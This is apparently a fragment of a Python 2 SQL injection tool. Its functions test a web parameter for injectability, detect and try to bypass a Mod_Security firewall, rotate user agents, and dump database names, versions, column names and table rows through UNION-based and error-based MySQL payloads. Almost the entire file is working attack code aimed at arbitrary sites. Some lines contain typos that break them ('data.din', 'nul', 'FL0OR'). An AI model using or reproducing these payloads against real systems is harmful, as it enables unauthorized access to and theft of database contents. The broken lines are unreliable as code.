def id_checker(url, param, waf, nc):
burl = ""
nurl = ""
data = ""
rangestr = ""
i = 0
user_agent = rand_agent()
headers = {'User-Agent': user_agent}
print colored(" [+] User-Agent: " + user_agent, 'green')
burl = focpa(url, param)
while (i <= nc):
nurl = burl
rangestr = turing_range(nc, i, "CHAR(088,071,068,079,082,075,013,010)")
nurl += "-1984 UNION SELECT " + rangestr + " --"
if (waf == 1):
nurl = sbws(nurl)
#print (nurl)
r = requests.get(nurl, headers=headers)
data = r.text.encode('utf-8')
if (data.find('XGDORK') > -1):
#print ("ID Injectable: "+str(i))
return i
i += 1
print colored(" [!] Id checker failed ", 'red')
print colored(
" [*] Try Manually (it's more Fun and Education) or use SQLmap (it's eZ')",
'red')
exit(0)
def heuristic_nc(url, param, waf):
burl = ""
nurl = ""
i = 0
ids_inject = []
rangestr = ""
data = ""
user_agent = rand_agent()
headers = {'User-Agent': user_agent}
print colored(" [+] User-Agent: " + user_agent, 'green')
burl = focpa(url, param)
print colored(" [*] COUNT, can take a while, wait ...", 'cyan')
while (i <= 55):
nurl = burl
rangestr = turing_heur(i)
nurl += "-1984 UNION SELECT " + rangestr + " --"
if (waf == 1):
nurl = sbws(nurl)
#print (nurl)
if (i == 1):
print colored("- 1 to 10 ", 'cyan')
if (i == 11):
print colored("- 10 to 20 ", 'cyan')
if (i == 21):
print colored("- 20 to 30 ", 'cyan')
if (i == 31):
print colored("- 30 to 40 ", 'cyan')
if (i == 41):
print colored("- 40 to 55 ", 'cyan')
r = requests.get(nurl, headers=headers)
data = r.text.encode('utf-8')
if (data.find('XGDORK') > -1):
print colored(" [!] URL appears as injectable ...", 'green')
return i + 1
i += 1
print colored(" [!] Heuristic nc failed ", 'red')
print colored(
" [*] Try Manually (it's more Fun and Education) or use SQLmap (it's eZ')",
'red')
exit(0)
def count_nc(url, param, waf):
burl = ""
nurl = ""
i = 1
user_agent = rand_agent()
headers = {'User-Agent': user_agent}
print colored(" [+] User-Agent: " + user_agent, 'green')
burl = focpa(url, param)
print colored(" [*] COUNT, Can take a while, wait ...", 'cyan')
while (i <= 55):
nurl = burl
nurl += str(i) + " ORDER BY " + str(i) + " --"
if (waf == 1):
nurl = sbws(nurl)
#print (nurl)
if (i == 1):
print colored("- 1 to 10 ", 'cyan')
if (i == 11):
print colored("- 10 to 20 ", 'cyan')
if (i == 21):
print colored("- 20 to 30 ", 'cyan')
if (i == 31):
print colored("- 30 to 40 ", 'cyan')
if (i == 41):
print colored("- 40 to 55 ", 'cyan')
r = requests.get(nurl, headers=headers)
data = r.text.encode('utf-8')
if (data.find("Unknown column '") > -1
and data.find("' in 'order clause'") > -1
or data.find('mysql_num_rows():') > -1
or data.find('mysql_num_row():') > -1):
#print ("DEBUG ERROR FOUND: "+str(i))
print colored(" [+] URL appears as injectable ...", 'green')
return (i - 1)
i += 1
print colored(" [!] Count nc failed ", 'red')
print colored(
" [*] Try Manually (it's more Fun and Education) or use SQLmap (it's eZ')",
'red')
exit(0)
def dumpData_s(url, param, waf, modx, nc, idx, table, fields, dbx):
burl = ""
nurl = ""
data = ""
tmp = ""
tmp_l = ""
rangestr = ""
stress = 0
error_syntax = 0
i = 0
j = 0
data_s_list = []
user_agent = rand_agent()
headers = {'User-Agent': user_agent}
print colored(" [+] User-Agent: " + user_agent, 'green')
burl = focpa(url, param)
if (modx == 1):
nurl = burl
insertFields = turing_fields(fields)
rangestr = turing_range(
nc, idx, "GROUP_CONCAT(CHAR(040,094,035,094,041)," +
str(insertFields) + ",CHAR(040,118,035,118,041))")
nurl += "-1984 UNION SELECT " + rangestr + " FROM '" + table + "' --"
if (waf == 1):
nurl = sbws(nurl)
#print (nurl)
r = requests.get(nurl, headers=headers)
data = r.text.encode('utf-8')
if (data.find("(V#V)") == -1 and data.find("(^#^)") == -1):
print colored(" [*] Change syntax ... ", 'cyan')
nurl = burl
nurl += "-1984 UNION SELECT " + rangestr + " FROM 0x" + str(
table.encode('hex')) + " --"
if (waf == 1):
nurl = sbws(nurl)
#print (nurl)
r = requests.get(nurl, headers=headers)
data = r.text.encode('utf-8')
if (data.find("(V#V)") == -1 and data.find("(^#^)") == -1):
print colored(" [*] Change syntax ... ", 'cyan')
while (stress == 0):
nurl = burl
j = 0
while (j < len(fields) and stress == 0):
nurl = burl
rangestr = turing_range(
nc, idx, "CONCAT(CHAR(040,094,035,094,041)," +
str(fields[j]) + ",CHAR(040,118,035,118,041))")
nurl += "-1984 UNION SELECT " + rangestr + " FROM " + table + " LIMIT " + str(
i) + ",1 --"
if (waf == 1):
nurl = sbws(nurl)
#print (nurl)
r = requests.get(nurl, headers=headers)
data = r.text.encode('utf-8')
tmp = str(parserDump(data, 1))
tmp = tmp.replace('[',
'').replace(']',
'').replace("'", '')
if (tmp != ''):
tmp_l += " "
tmp_l += tmp
j += 1
if (data.find("(V#V)") == -1 and data.find("(^#^)") == -1):
stress = 1
if (tmp_l != ''):
data_s_list.append(tmp_l)
i += 1
else:
data_s_list = parserDump(data, 0)
else:
data_s_list = parserDump(data, 0)
if (len(data_s_list) > 0):
print(str(data_s_list))
return data_s_list
else:
print colored(" [-] Injection attempt failed ", 'red')
print colored(
" [*] Try Manually (it's more Fun and Education) or use SQLmap (it's eZ')",
'red')
exit(0)
elif (modx == 2):
insertFields = turing_fields(fields)
while (stress == 0):
nurl = burl
if (error_syntax == 0):
nurl += "1 AND (SELECT 1984 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(0x28,0x5e,0x23,0x5e,0x29,CONCAT(" + str(
insertFields
) + ") AS CHAR),0x28,0x56,0x23,0x56,0x29)) FROM " + str(
dbx
) + "." + str(table) + " LIMIT " + str(
i
) + ",1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) --"
if (waf == 1):
nurl = sbws(nurl)
#print (nurl)
r = requests.get(nurl, headers=headers)
data = r.text.encode('utf-8')
if (data.find("You have an error in your SQL syntax;") > -1
or data.find("Subquery returns more than 1 row") > -1
or data.find("this is incompatible ") > -1
or data.find("Nothing found!") > -1 or
data.din("Not found") > -1 and data.find("(^#^)") == -1):
stress = 1
error_syntax += 1
i = 0
else:
tmp = str(parserDump(data, 1))
tmp = tmp.replace('[', '').replace(']', '').replace("'", '')
if (tmp != ''):
data_s_list.append(tmp)
else:
stress = 1
i += 1
if (len(data_s_list) > 0):
print(str(data_s_list))
return data_s_list
print colored(" [*] Change syntax ... ", 'cyan')
stress = 0
i = 0
while (stress == 0):
j = 0
while (j < len(fields)):
nurl = burl
if (error_syntax == 1):
nurl += "1 OR (SELECT 1984 FROM (SELECT COUNT(*),CONCAT((SELECT CONCAT(0x28,0x5e,0x23,0x5e,0x29," + str(
fields[j]
) + ",0x28,0x56,0x23,0x56,0x29) FROM " + str(
dbx
) + "." + str(table) + " LIMIT " + str(
i
) + ",1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) --"
elif (error_syntax == 2):
nurl += "1 OR (SELECT 1984 FROM (SELECT COUNT(*),CONCAT((SELECT CONCAT(0x28,0x5e,0x23,0x5e,0x29," + str(
fields[j]
) + ",0x28,0x56,0x23,0x56,0x29) FROM " + str(
table
) + "=" + str(dbx) + "." + str(table).encode(
'hex'
) + " LIMIT " + str(
i
) + ",1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) --"
elif (error_syntax == 3):
nurl += "1 OR (SELECT 1984 FROM (SELECT COUNT(*),CONCAT((SELECT CONCAT(0x28,0x5e,0x23,0x5e,0x29," + str(
fields[j]) + ",0x28,0x56,0x23,0x56,0x29) FROM " + str(
dbx) + "." + str(table) + " LIMIT " + str(
i) + ",1),FLOOR(RAND(0)*2))x FROM " + str(
dbx) + "." + str(
table) + " GROUP BY x)a) --"
if (waf == 1):
nurl = sbws(nurl)
#print (nurl)
r = requests.get(nurl, headers=headers)
data = r.text.encode('utf-8')
if (data.find("You have an error in your SQL syntax;") > -1
or data.find("Error in SQL Query") > -1
and data.find("(^#^)") == -1):
print colored(" [*] Change syntax ... ", 'cyan')
error_syntax += 1
i = 0
else:
tmp = str(parserDump(data, 1))
tmp = tmp.replace('[', '').replace(']',
'').replace("'", '')
tmp_l += " "
tmp_l += tmp
j += 1
if (data.find("(^#^)") == -1):
stress = 1
if (tmp_l != ''):
data_s_list.append(tmp_l)
tmp_l = ""
else:
stress = 1
i += 1
if (len(data_s_list) > 0):
print(str(data_s_list))
return data_s_list
else:
print colored(" [-] Injection attempt failed ", 'red')
print colored(
" [*] Try Manually (it's more Fun and Education) or use SQLmap (it's eZ')",
'red')
exit(0)
def dumpColumns(url, param, waf, modx, nc, idx, table):
burl = ""
nurl = ""
data = ""
tmp = ""
rangestr = ""
stress = 0
error_syntax = 0
i = 0
columns_list = []
user_agent = rand_agent()
headers = {'User-Agent': user_agent}
print colored(" [+] User-Agent: " + user_agent, 'green')
burl = focpa(url, param)
if (modx == 1):
nurl = burl
rangestr = turing_range(
nc, idx,
"GROUP_CONCAT(CHAR(040,094,035,094,041),COLUMN_NAME,CHAR(040,118,035,118,041))"
)
nurl += "-1984 UNION SELECT " + rangestr + " FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA=database() AND TABLE_NAME='" + table + "' --"
if (waf == 1):
nurl = sbws(nurl)
#print (nurl)
r = requests.get(nurl, headers=headers)
data = r.text.encode('utf-8')
if (data.find("(V#V)") == -1 and data.find("(^#^)") == -1):
print colored(" [*] Change syntax ... ", 'cyan')
nurl = burl
nurl += "-1984 UNION SELECT " + rangestr + " FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA=database() AND TABLE_NAME LIKE 0x" + str(
table).encode('hex') + " --"
if (waf == 1):
nurl = sbws(nurl)
#print (nurl)
r = requests.get(nurl, headers=headers)
data = r.text.encode('utf-8')
if (data.find("(V#V)") == -1 and data.find("(^#^)") == -1):
print colored(" [*] Change syntax ... ", 'cyan')
rangestr = turing_range(
nc, idx,
"CONCAT(CHAR(040,094,035,094,041),COLUMN_NAME,CHAR(040,118,035,118,041))"
)
while (stress == 0):
nurl = burl
nurl += "-1984 UNION SELECT " + rangestr + " FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA=database() AND TABLE_NAME LIKE 0x" + str(
table).encode('hex') + " LIMIT " + str(i) + ",1 --"
if (waf == 1):
nurl = sbws(nurl)
#print (nurl)
r = requests.get(nurl, headers=headers)
data = r.text.encode('utf-8')
if (data.find("(V#V)") == -1 and data.find("(^#^)") == -1):
stress = 1
tmp = str(parserDump(data, 1))
tmp = tmp.replace('[', '').replace(']',
'').replace("'", '')
if (tmp != ''):
columns_list.append(tmp)
i += 1
else:
columns_list = parserDump(data, 0)
else:
columns_list = parserDump(data, 0)
if (len(columns_list) > 0):
print(str(columns_list))
return columns_list
else:
print colored(" [-] Injection attempt failed ", 'red')
print colored(
" [*] Try Manually (it's more Fun and Education) or use SQLmap (it's eZ')",
'red')
exit(0)
elif (modx == 2):
while (stress == 0):
nurl = burl
if (error_syntax == 0):
nurl += "1 AND (SELECT 1984 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(0x28,0x5e,0x23,0x5e,0x29,CAST(COLUMN_NAME AS CHAR),0x28,0x56,0x23,0x56,0x29)) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x" + table.encode(
'hex'
) + " LIMIT " + str(
i
) + ",1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) --"
elif (error_syntax == 1):
nurl += "1 OR (SELECT 1984 FROM (SELECT COUNT(*),CONCAT((SELECT CONCAT(0x28,0x5e,0x23,0x5e,0x29,COLUMN_NAME,0x28,0x56,0x23,0x56,0x29) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA=database() AND TABLE_NAME=0x" + table.encode(
'hex'
) + " LIMIT " + str(
i
) + ",1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) --"
elif (error_syntax == 2):
nurl += "1 OR (SELECT 1984 FROM (SELECT COUNT(*),CONCAT((SELECT CONCAT(0x28,0x5e,0x23,0x5e,0x29,COLUMN_NAME,0x28,0x56,0x23,0x56,0x29) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA LIKE database() AND TABLE_NAME=0x" + table.encode(
'hex'
) + " LIMIT " + str(
i
) + ",1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) --"
if (waf == 1):
nurl = sbws(nurl)
#print (nurl)
r = requests.get(nurl, headers=headers)
data = r.text.encode('utf-8')
if (data.find("You have an error in your SQL syntax;") > -1
or data.find("Subquery returns more than 1 row") > -1
or data.find("this is incompatible ") > -1
or data.find("Nothing found!") > -1 or
data.find("not found") > -1 and data.find("(^#^)") == -1):
print colored(" [*] Change syntax ... ", 'cyan')
error_syntax += 1
i = 0
else:
tmp = str(parserDump(data, 1))
tmp = tmp.replace('[', '').replace(']', '').replace("'", '')
if (tmp != ''):
columns_list.append(tmp)
else:
stress = 1
i += 1
if (len(columns_list) > 0):
print(str(columns_list))
return columns_list
else:
print colored(" [-] Injection attempt failed ", 'red')
print colored(
" [*] Try Manually (it's more Fun and Education) or use SQLmap (it's eZ')",
'red')
exit(0)
def dumpDatabase(url, param, waf, modx, nc, idx):
burl = ""
nurl = ""
data = ""
rangestr = ""
database_list = []
tmpfile = file
user_agent = rand_agent()
headers = {'User-Agent': user_agent}
print colored(" [+] User-Agent: " + user_agent, 'green')
burl = focpa(url, param)
if (modx == 1):
nurl = burl
rangestr = turing_range(
nc, idx,
"GROUP_CONCAT(CHAR(040,094,035,094,041),@@version,database(),CHAR(040,118,035,118,041))"
)
nurl += "-1984 UNION SELECT " + rangestr + " --"
if (waf == 1):
nurl = sbws(nurl)
#print (nurl)
r = requests.get(nurl, headers=headers)
data = r.text.encode('utf-8')
if (data.find("(V#V)") == -1 and data.find("(^#^)") == -1):
print colored(" [*] Change syntax ... ", 'cyan')
nurl = burl
rangestr = turing_range(
nc, idx,
"CONCAT(CHAR(040,094,035,094,041),@@version,database(),CHAR(040,118,035,118,041))"
)
nurl += "-1984 UNION SELECT " + rangestr + " --"
if (waf == 1):
nurl = sbws(nurl)
#print (nurl)
r = requests.get(nurl, headers=headers)
data = r.text.encode('utf-8')
database_list = parserDump(data, 1)
else:
database_list = parserDump(data, 1)
if (len(database_list) > 0):
print colored(" [+] URL is injectable", 'green')
print(str(database_list))
tmpfile = open("tmpfile", 'w')
tmpfile.write(str(modx) + "\n")
tmpfile.write(str(waf) + "\n")
tmpfile.write(database_list[0] + "\n")
tmpfile.write(str(nc) + "\n")
tmpfile.write(str(idx) + "\n")
tmpfile.close()
return database_list
else:
print colored(" [-] Injection attempt failed ", 'red')
print colored(
" [*] Try Manually (it's more Fun and Education) or use SQLmap (it's eZ')",
'red')
exit(0)
elif (modx == 2):
nurl = burl
nurl += "1 OR 1984 GROUP BY CONCAT(0x28,0x5e,0x23,0x5e,0x29,version(),0x28,0x56,0x23,0x56,0x29,floor(rand(0)*2)) HAVING MIN(0) OR 1 --"
if (waf == 1):
nurl = sbws(nurl)
#print (nurl)
r = requests.get(nurl, headers=headers)
data = r.text.encode('utf-8')
if (data.find("(^#^)") == -1):
print colored(" [*] Change syntax ... ", 'cyan')
nurl = burl
nurl += "1 OR (SELECT 1984 FROM (SELECT COUNT(*),CONCAT(0x28,0x5e,0x23,0x5e,0x29,version(),0x28,0x56,0x23,0x56,0x29,(SELECT(ELT(1984=1984,1))),FL0OR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) --"
if (waf == 1):
nurl = sbws(nurl)
#print (nurl)
r = requests.get(nurl, headers=headers)
data = r.text.encode('utf-8')
if (data.find("(^#^)") == -1):
print colored(" [*] Change syntax ... ", 'cyan')
nurl = burl
nurl += "1 OR (SELECT 1984 FROM (SELECT COUNT(*),CONCAT(0x28,0x5e,0x23,0x5e,0x29,version(),0x28,0x56,0x23,0x56,0x29,CEILING(RAND(0)*CONVERT(2,BINARY)))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) --"
if (waf == 1):
nurl = sbws(nurl)
#print (nurl)
r = requests.get(nurl, headers == headers)
data = r.text.encode('utf-8')
tmp = str(parserDump(data, 1))
tmp = tmp.replace('[', '').replace(']', '').replace("'", '')
else:
tmp = str(parserDump(data, 1))
tmp = tmp.replace('[', '').replace(']', '').replace("'", '')
else:
tmp = str(parserDump(data, 1))
tmp = tmp.replace('[', '').replace(']', '').replace("'", '')
if (tmp != ''):
print colored(" [+] URL appears as injectable ...", 'green')
database_list.append(tmp)
nurl = burl
nurl += "1 AND (SELECT 1984 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(0x28,0x5e,0x23,0x5e,0x29,CAST(database() AS CHAR),0x28,0x56,0x23,0x56,0x29)) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=database() LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) --"
if (waf == 1):
nurl = sbws(nurl)
#print (nurl)
r = requests.get(nurl, headers=headers)
data = r.text.encode('utf-8')
if (data.find("(^#^)") == -1):
print colored(" [*] Change syntax ... ", 'cyan')
nurl = burl
nurl += "1 OR (SELECT 1984 FROM (SELECT COUNT(*),CONCAT(0x28,0x5e,0x23,0x5e,0x29,database(),0x28,0x56,0x23,0x56,0x29,(SELECT(ELT(1984=1984,1))),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) --"
if (waf == 1):
nurl = sbws(nurl)
#print (nurl)
r = requests.get(nurl, headers=headers)
data = r.text.encode('utf-8')
if (data.find("(^#^)") == -1):
print colored(" [*] Change syntax ... ", 'cyan')
nurl = burl
nurl += "1 OR (SELECT 1984 FROM (SELECT COUNT(*),CONCAT(0x28,0x5e,0x23,0x5e,0x29,database(),0x28,0x56,0x23,0x56,0x29,CEILING(RAND(0)*CONVERT(2,BINARY)))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) --"
if (waf == 1):
nurl = sbws(nul)
#print (nurl)
r = requests.get(nurl, headers=headers)
data = r.text.encode('utf-8')
tmp = str(parserDump(data, 1))
tmp = tmp.replace('[', '').replace(']',
'').replace("'", '')
else:
tmp = str(parserDump(data, 1))
tmp = tmp.replace('[', '').replace(']',
'').replace("'", '')
else:
tmp = str(parserDump(data, 1))
tmp = tmp.replace('[', '').replace(']', '').replace("'", '')
if (tmp != ''):
database_list.append(tmp)
else:
print colored(" [-] Injection attempt failed ", 'red')
print colored(
" [*] Try Manually (it's more Fun and Education) or use SQLmap (it's eZ')",
'red')
exit(0)
else:
print colored(" [-] Injection attempt failed ", 'red')
print colored(
" [*] Try Manually (it's more Fun and Education) or use SQLmap (it's eZ')",
'red')
exit(0)
if (len(database_list) > 1):
print colored(" [+] URL is injectable", 'green')
print(str(database_list))
tmpfile = open("tmpfile", 'w')
tmpfile.write(str(modx) + "\n")
tmpfile.write(str(waf) + "\n")
tmpfile.write(str(database_list[1]) + "\n")
tmpfile.write(str(nc) + "\n")
tmpfile.write(str(idx) + "\n")
tmpfile.close()
return database_list
else:
print colored(" [-] Injection attempt failed ", 'red')
print colored(
" [*] Try Manually (it's more Fun and Education) or use SQLmap (it's eZ')",
'red')
exit(0)
def stress_url(url, param):
burl = ""
nurl = ""
data = ""
waf = 0
result = []
burl = focpa(url, param)
user_agent = rand_agent()
headers = {'User-Agent': user_agent}
print colored(" [+] User-Agent: " + user_agent, 'green')
print colored(" [*] Stress URL ... ", 'green')
nurl = burl
nurl += "1984 AND CONCAT(CHAR(088,071,068,079,082,075,013,010))"
#print (nurl)
r = requests.get(nurl, headers=headers)
data = r.text.encode('utf-8')
if (data.find("Mod_Security") > -1
or data.find("You don't have permission ") > -1):
print colored(" [!] WAF Detected ! ", 'red')
waf = 1
nurl = burl
nurl += "-300 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,database(),156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300 --"
if (waf == 1):
nurl = sbws(nurl)
#print (nurl)
r = requests.get(nurl, headers=headers)
data = r.text.encode('utf-8')
if (data.find('The used SELECT statements ') > -1):
print colored(" [!] ERROR-BASED FOUND !", 'green')
if (waf == 1):
result.append(1)
else:
result.append(0)
result.append(2)
return result
else:
nurl = burl
nurl += "777 ORDER BY 777 --"
if (waf == 1):
nurl = sbws(nurl)
#print (nurl)
r = requests.get(nurl, headers=headers)
data = r.text.encode('utf-8')
if (data.find("Unknown column '") > -1
and data.find("' in 'order clause'") > -1
or data.find('mysql_num_rows():') > -1
or data.find('mysql_num_row():') > -1):
print colored(" [!] UNION-BASED FOUND !", 'green')
if (waf == 1):
result.append(1)
else:
result.append(0)
result.append(1)
return result
else:
print colored(" [*] TEST HEURISTIC-UNION ...", 'green')
if (waf == 1):
result.append(1)
else:
result.append(0)
result.append(3)
return result
